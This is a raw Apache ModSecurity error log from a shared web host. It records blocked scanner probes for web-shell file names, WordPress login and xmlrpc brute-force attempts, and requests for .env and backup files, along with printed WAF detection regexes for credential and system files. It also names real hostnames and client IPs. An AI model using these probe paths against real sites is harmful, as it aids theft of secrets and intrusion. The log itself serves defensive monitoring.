[Tue May 26 12:45:03.904394 2026] [security2:error] [pid 448967:tid 449213] [client 2a00:17d8:200::f1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVId-XLPuWQsfM-UVSWlwAAdHQ"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 12:45:04.339700 2026] [security2:error] [pid 448967:tid 449207] [client 4.201.75.230:46051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/chosen.php"] [unique_id "ahVIeOXLPuWQsfM-UVSWpQAAAG4"]
[Tue May 26 12:45:05.270674 2026] [security2:error] [pid 448967:tid 449159] [client 4.201.75.230:46023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/defaults.php"] [unique_id "ahVIeeXLPuWQsfM-UVSWuQAAAD4"]
[Tue May 26 12:45:05.795449 2026] [security2:error] [pid 448967:tid 449110] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIeeXLPuWQsfM-UVSWvAAAAA0"]
[Tue May 26 12:45:06.798571 2026] [security2:error] [pid 448967:tid 449192] [client 109.70.100.12:33932] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "109.70.100.12" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVIeuXLPuWQsfM-UVSW3AAAAF8"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 12:45:06.798718 2026] [security2:error] [pid 448967:tid 449192] [client 109.70.100.12:33932] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVIeuXLPuWQsfM-UVSW3AAAAF8"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 12:45:08.158259 2026] [security2:error] [pid 448967:tid 449222] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIe-XLPuWQsfM-UVSW7gAAAH0"]
[Tue May 26 12:45:09.429985 2026] [security2:error] [pid 448967:tid 449114] [client 157.20.138.61:57517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIfeXLPuWQsfM-UVSXGAAAABE"]
[Tue May 26 12:45:09.430166 2026] [security2:error] [pid 448967:tid 449114] [client 157.20.138.61:57517] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIfeXLPuWQsfM-UVSXGAAAABE"]
[Tue May 26 12:45:10.502657 2026] [security2:error] [pid 448967:tid 448997] [remote 124.156.212.23:51154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVIfuXLPuWQsfM-UVSXJQAAAx0"]
[Tue May 26 12:45:10.947700 2026] [security2:error] [pid 448967:tid 449104] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIfuXLPuWQsfM-UVSXLgAAAAc"]
[Tue May 26 12:45:11.724751 2026] [security2:error] [pid 448967:tid 449215] [client 4.201.75.230:46035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/info.php"] [unique_id "ahVIf-XLPuWQsfM-UVSXQAAAAHY"]
[Tue May 26 12:45:13.009365 2026] [security2:error] [pid 448967:tid 449216] [client 4.201.75.230:46068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/bless.php"] [unique_id "ahVIgeXLPuWQsfM-UVSXVgAAAHc"]
[Tue May 26 12:45:14.100348 2026] [security2:error] [pid 448967:tid 449153] [client 4.201.75.230:46025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/aa.php"] [unique_id "ahVIguXLPuWQsfM-UVSXcAAAADg"]
[Tue May 26 12:45:14.368584 2026] [security2:error] [pid 448967:tid 449131] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVIgeXLPuWQsfM-UVSXaAAAACI"]
[Tue May 26 12:45:14.629676 2026] [security2:error] [pid 448967:tid 449151] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIguXLPuWQsfM-UVSXdgAAADY"]
[Tue May 26 12:45:15.125991 2026] [ssl:error] [pid 448967:tid 449169] [client 98.84.1.175:11834] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname autoconfig.madhuraclinic.svijaykumar.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 12:45:16.321266 2026] [security2:error] [pid 448967:tid 449104] [client 92.246.141.118:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIg-XLPuWQsfM-UVSXowAAAAc"]
[Tue May 26 12:45:16.924684 2026] [security2:error] [pid 448967:tid 449218] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIhOXLPuWQsfM-UVSXsQAAAHk"]
[Tue May 26 12:45:16.963284 2026] [security2:error] [pid 448967:tid 449153] [client 4.201.75.230:46030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/xmrlpc.php"] [unique_id "ahVIhOXLPuWQsfM-UVSXwQAAADg"]
[Tue May 26 12:45:17.667296 2026] [security2:error] [pid 448967:tid 449115] [client 45.151.139.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIheXLPuWQsfM-UVSXyQAAABI"], referer: https://www.anujtradingco.com/
[Tue May 26 12:45:18.945513 2026] [security2:error] [pid 448967:tid 449104] [client 45.151.139.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIhuXLPuWQsfM-UVSX4QAAAAc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 12:45:19.048003 2026] [security2:error] [pid 448967:tid 449173] [client 4.201.75.230:46065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/class.php"] [unique_id "ahVIh-XLPuWQsfM-UVSX6AAAAEw"]
[Tue May 26 12:45:19.749787 2026] [security2:error] [pid 448967:tid 449109] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIh-XLPuWQsfM-UVSX8AAAAAw"]
[Tue May 26 12:45:20.080134 2026] [security2:error] [pid 448967:tid 449112] [client 157.20.138.61:57872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIiOXLPuWQsfM-UVSYBQAAAA8"]
[Tue May 26 12:45:20.080279 2026] [security2:error] [pid 448967:tid 449112] [client 157.20.138.61:57872] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIiOXLPuWQsfM-UVSYBQAAAA8"]
[Tue May 26 12:45:22.007617 2026] [security2:error] [pid 448967:tid 449132] [client 4.201.75.230:46066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/aw.php"] [unique_id "ahVIiuXLPuWQsfM-UVSYLgAAACM"]
[Tue May 26 12:45:23.145648 2026] [security2:error] [pid 448967:tid 449186] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIiuXLPuWQsfM-UVSYRAAAAFk"]
[Tue May 26 12:45:23.195473 2026] [security2:error] [pid 448967:tid 449224] [client 4.201.75.230:46020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/bb.php"] [unique_id "ahVIi-XLPuWQsfM-UVSYUgAAAH8"]
[Tue May 26 12:45:23.671727 2026] [security2:error] [pid 448967:tid 449174] [client 45.151.139.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIi-XLPuWQsfM-UVSYWwAAAE0"], referer: https://anujtradingco.com
[Tue May 26 12:45:25.696531 2026] [security2:error] [pid 448967:tid 449194] [client 4.201.75.230:46037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/222.php"] [unique_id "ahVIjeXLPuWQsfM-UVSYjQAAAGE"]
[Tue May 26 12:45:26.339312 2026] [security2:error] [pid 448967:tid 449100] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIjeXLPuWQsfM-UVSYlAAAAAM"]
[Tue May 26 12:45:27.478720 2026] [security2:error] [pid 448967:tid 449110] [client 4.201.75.230:5361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/test1.php"] [unique_id "ahVIj-XLPuWQsfM-UVSYsQAAAA0"]
[Tue May 26 12:45:29.215077 2026] [security2:error] [pid 448967:tid 449148] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIkOXLPuWQsfM-UVSYxgAAADM"]
[Tue May 26 12:45:29.322572 2026] [security2:error] [pid 448967:tid 449200] [client 149.62.41.5:54310] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "149.62.41.5" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVIkeXLPuWQsfM-UVSY0wAAAGc"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 12:45:30.638902 2026] [security2:error] [pid 448967:tid 449139] [client 157.20.138.61:58225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIkuXLPuWQsfM-UVSY8AAAACo"]
[Tue May 26 12:45:30.639077 2026] [security2:error] [pid 448967:tid 449139] [client 157.20.138.61:58225] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIkuXLPuWQsfM-UVSY8AAAACo"]
[Tue May 26 12:45:31.917741 2026] [security2:error] [pid 448967:tid 449159] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIk-XLPuWQsfM-UVSZAAAAAD4"]
[Tue May 26 12:45:34.614213 2026] [security2:error] [pid 448967:tid 449109] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIluXLPuWQsfM-UVSZLwAAAAw"]
[Tue May 26 12:45:35.394082 2026] [security2:error] [pid 448967:tid 449104] [client 62.60.130.233:53629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "organicveggie.tk.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVIl-XLPuWQsfM-UVSZQwAAAAc"], referer: https://www.linkedin.com/
[Tue May 26 12:45:35.731990 2026] [security2:error] [pid 448967:tid 449125] [client 62.60.130.233:55779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "organicveggie.tk.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVIl-XLPuWQsfM-UVSZSgAAABw"], referer: https://www.facebook.com/
[Tue May 26 12:45:37.360126 2026] [security2:error] [pid 448967:tid 449216] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVImOXLPuWQsfM-UVSZYwAAAHc"]
[Tue May 26 12:45:37.385575 2026] [security2:error] [pid 448967:tid 449114] [client 4.201.75.230:5260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/css/autoload_classmap.php"] [unique_id "ahVImeXLPuWQsfM-UVSZcQAAABE"]
[Tue May 26 12:45:37.645421 2026] [security2:error] [pid 448967:tid 449176] [client 31.57.184.107:53268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "zeexo.glorodrc.com"] [uri "/wp-login.php"] [unique_id "ahVImeXLPuWQsfM-UVSZdgAAAE8"], referer: https://duckduckgo.com/
[Tue May 26 12:45:38.019321 2026] [security2:error] [pid 448967:tid 449071] [remote 111.229.141.137:36658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVImeXLPuWQsfM-UVSZewAAIWc"]
[Tue May 26 12:45:38.341290 2026] [security2:error] [pid 448967:tid 449196] [client 54.87.247.130:35372] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "keydussecurity.com"] [uri "/"] [unique_id "ahVImuXLPuWQsfM-UVSZhwAAAGM"]
[Tue May 26 12:45:40.486036 2026] [security2:error] [pid 448967:tid 449123] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVInOXLPuWQsfM-UVSZvQAAABo"], referer: https://www.anujtradingco.com/
[Tue May 26 12:45:40.596158 2026] [security2:error] [pid 448967:tid 449155] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVInOXLPuWQsfM-UVSZtAAAADo"]
[Tue May 26 12:45:40.848124 2026] [security2:error] [pid 448967:tid 449140] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVInOXLPuWQsfM-UVSZyQAAACs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430734&moderation-hash=a20bc0fb2911a8e00a99b53c3f34fd6d
[Tue May 26 12:45:41.311487 2026] [security2:error] [pid 448967:tid 449215] [client 157.20.138.61:58575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIneXLPuWQsfM-UVSZ3AAAAHY"]
[Tue May 26 12:45:41.311659 2026] [security2:error] [pid 448967:tid 449215] [client 157.20.138.61:58575] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIneXLPuWQsfM-UVSZ3AAAAHY"]
[Tue May 26 12:45:41.557397 2026] [security2:error] [pid 448967:tid 449164] [client 202.76.169.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIneXLPuWQsfM-UVSZ2QAAAEM"]
[Tue May 26 12:45:41.681349 2026] [security2:error] [pid 448967:tid 449132] [client 5.255.125.45:33870] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "axum-vermogen.eu"] [uri "/.env.local"] [unique_id "ahVIneXLPuWQsfM-UVSZ7QAAACM"]
[Tue May 26 12:45:41.681496 2026] [security2:error] [pid 448967:tid 449132] [client 5.255.125.45:33870] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "axum-vermogen.eu"] [uri "/.env.local"] [unique_id "ahVIneXLPuWQsfM-UVSZ7QAAACM"]
[Tue May 26 12:45:41.684531 2026] [security2:error] [pid 448967:tid 449199] [client 5.255.125.45:33872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "axum-vermogen.eu"] [uri "/.env"] [unique_id "ahVIneXLPuWQsfM-UVSZ7gAAAGY"]
[Tue May 26 12:45:41.897765 2026] [security2:error] [pid 448967:tid 449161] [client 5.255.125.45:33872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "axum-vermogen.eu"] [uri "/.env.bak"] [unique_id "ahVIneXLPuWQsfM-UVSZ9AAAAEA"]
[Tue May 26 12:45:41.925584 2026] [security2:error] [pid 448967:tid 449207] [client 5.255.125.45:33880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "axum-vermogen.eu"] [uri "/.env.backup"] [unique_id "ahVIneXLPuWQsfM-UVSZ9QAAAG4"]
[Tue May 26 12:45:42.444833 2026] [core:error] [pid 448967:tid 449215] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:42.444850 2026] [core:error] [pid 448967:tid 449215] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:42.449228 2026] [core:error] [pid 448967:tid 449101] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:42.449251 2026] [core:error] [pid 448967:tid 449101] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:43.490448 2026] [security2:error] [pid 448967:tid 449183] [client 4.201.75.230:5268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/fx.php"] [unique_id "ahVIn-XLPuWQsfM-UVSaMwAAAFY"]
[Tue May 26 12:45:43.540264 2026] [security2:error] [pid 448967:tid 449210] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIn-XLPuWQsfM-UVSaLAAAAHE"]
